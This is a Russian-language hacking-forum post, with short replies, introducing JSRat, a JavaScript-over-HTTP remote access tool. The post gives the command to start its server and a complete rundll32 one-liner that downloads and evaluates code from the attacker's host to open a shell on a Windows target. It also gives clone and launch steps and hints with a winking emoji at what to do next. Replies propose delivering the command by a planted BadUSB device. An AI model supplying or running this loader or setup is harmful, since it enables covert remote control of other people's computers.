• Открыта запись на вторую часть курса по анонимности и безопасности в сети интернет "Paranoid II" от команды codeby. Анонимные роутеры, Подъём, настройка и администрирование Tor-ноды, Работа с железом ПК, Удаление аппаратных закладок, Минимизация рисков, Авторские разработки и многое другое. Подробнее ...

Soft JSRAT - HTTP-оболочка с использованием JavaScript

Литиум

Литиум

Well-known member
13.12.2017
337
600
Всем привет.
Страница разработчика -==
Разработчик -== aspiggy

Внимание! Автор не несет никакой ответственности за плохое использование этого инструмента!
Введение.
JSRAT - HTTP-оболочка с использованием JavaScript



JSRat - это инструмент управления и контроля, в котором используются служебные данные JavaScript и протокол HTTP для связи между сервером и целевыми узлами. Есть два варианта реализации в Python и один в PowerShell.

JSRat запустит веб-сервер и будет ждать выполнения команды клиента:
Код:
# python JSRat.py -i 192.168.42.101 -p 8080
После того, как пользователь посетит URL-адрес команды клиента, соединение будет установлено с хостом. JSRat может использоваться для выполнения команд, запускать исполняемые файлы/скрипты.

Screenshot from 2018-08-26 20-22-08.png

Чтобы установить правильную оболочку, необходимо выполнить загрузку JavaScript. Эта полезная нагрузка хранится по URL-адресу:

Screenshot from 2018-08-26 20-25-36.png

Команда, которая была сгенерирована, должна быть выполнена из командной строки:
Код:
Cmd Windows:
# rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.42.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
После выполнения команды будет получена оболочка.

Дальше вы знаете что делать. :devilish:;)

Код:
Пример:
# run
codeby.net.exe
Код:
Установка и запуск:
# git clone https://github.com/aspiggy/JSRAT.git
# cd JSRAT
# Пример запуска: python JSRat.py -i 192.168.42.101 -p 8080

Спасибо за внимание.
 
Последнее редактирование:
G

ghost8

New member
21.06.2018
2
0
какой дурак только будет вводить это в cmd)))
 
N

NAlex

Member
09.07.2018
8
6
Может подкинутая BadUsb наберёт? :)
 
  • Нравится
Реакции: Dr.Lafa
Мы в соцсетях:  ТелеграмВконтактеДзенФейсбукТвиттерЮтуб